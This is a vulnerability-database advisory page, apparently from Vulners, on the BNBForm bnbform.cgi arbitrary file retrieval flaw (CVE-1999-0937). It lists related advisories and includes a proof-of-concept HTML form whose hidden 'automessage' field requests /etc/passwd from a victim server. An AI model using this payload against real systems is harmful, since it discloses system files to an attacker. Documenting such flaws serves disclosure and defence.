Vulners
Lucene search
BNBForm Automessage可远程获取文件漏洞
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | BNBForm bnbform.cgi Automessage Arbitrary File Retrieval | 20 Aug 200400:00 | – | nessus |
| Multiple Dangerous CGI Script Detection | 17 Jun 200300:00 | – | nessus |
 | CVE-1999-0937 | 4 Jan 200005:00 | – | cve |
 | CVE-1999-0937 | 4 Jan 200005:00 | – | cvelist |
 | EUVD-1999-0918 | 7 Oct 202500:30 | – | euvd |
 | CVE-1999-0937 | 3 Dec 199805:00 | – | nvd |
 | Detection of various dangerous CGI scripts (HTTP) - Active Check | 3 Nov 200500:00 | – | openvas |
 | PT-1998-1120 · Bnbform · Bnbform | 3 Dec 199800:00 | – | ptsecurity |
duke ([email protected])提供了如下测试方法:
<FORM METHOD= POST ACTION= http://www.victim.com/cgi-bin/bnbform.cgi >
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:* <INPUT TYPE= TEXT NAME= name SIZE=35 MAXLENGTH=50>
<!-- SCRIPT CONFIGURATION SECTION -->
<INPUT TYPE= HIDDEN NAME= autorespond VALUE= yes >
<INPUT TYPE= HIDDEN NAME= automessage VALUE= /etc/passwd >
<INPUT TYPE= HIDDEN NAME= ok_url VALUE= http://127.0.0.1/thanks.html >
<INPUT TYPE= HIDDEN NAME= not_ok_url VALUE= http://127.0.0.1/oops.html >
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Oct 2008 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.01229